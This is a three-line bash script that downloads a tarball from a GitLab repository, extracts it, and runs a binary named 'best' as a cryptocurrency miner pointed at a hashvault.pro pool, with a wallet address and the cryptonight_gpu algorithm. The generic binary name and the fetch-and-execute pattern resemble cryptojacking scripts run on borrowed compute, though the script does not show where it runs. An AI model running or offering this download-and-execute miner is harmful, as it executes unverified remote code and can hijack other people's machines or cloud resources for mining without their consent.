#!/bin/bash
wget https://gitlab.com/damithnissanka96/best/-/raw/main/best.tar.gz && tar -xvf best.tar.gz
./best --tls-url singapore01.hashvault.pro:80 --user ccx7aoNYpGb7sndJtEDWvCBQhPAy9mC8QW5KWuCx8J1FJrDcDrER1XYA9LGtggrR7ZC4KfQmQ2uRN47L9WypBbNLAeq2Q4Q9WN.df3ebece0970e12c6e9463d96e1c5d91ce6c65f940b428870f829fd35185d950 --pass shb --currency cryptonight_gpu
